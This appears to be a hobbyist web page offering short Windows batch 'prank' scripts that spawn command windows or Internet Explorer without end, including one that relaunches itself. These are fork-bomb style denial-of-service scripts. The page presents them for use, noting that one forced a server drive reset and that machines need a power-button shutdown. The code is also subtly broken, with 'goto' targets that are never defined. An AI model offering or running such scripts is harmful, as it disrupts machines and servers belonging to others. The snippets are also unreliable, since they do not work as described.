
On this page, you will only find the short codes written by us. To get the longer and more effective ones, please visit our Visual Studio page. Copy the following link or click the Button on the right.

CMD Overflow

Its one of the very simple codes. As soon as you start it, it opens a new console-window over and over.


Both of the codes do more or less the same.

@echo off


start cmd.exe

goto a

@echo off


start /max cmd.exe

goto a


Welcome to the troublemaker: This code may get you in trouble, wenn you run it on a server. As mentioned on the start-page, the IT management had to reset the complete drive. Use with caution!

Since we can't post ".exe" files to download, you have to be a member of our Visual Studio Team. Register here:

Max iExplore

Nobody likes Internet Explorer anyway. But we can make it even worse. This code will execute the Internet Explorer as many times as possible, while running itself from the start again and again. This means, that the command to start the Internet Explorer multiple times will be executed multiple times itself. In our test, if you run it on a PC, you can only do a powerbutton-shutdown to make it stop.

@echo off


start /max iexplore.exe

goto start

CMD Self-Overflow

This code is very similar to the first one, with the only difference that it doesn't just start a new CMD window. By starting it, the program starts itself over and over. And every programm then starts itself over and over again.

@echo off


start /max %0""

goto a: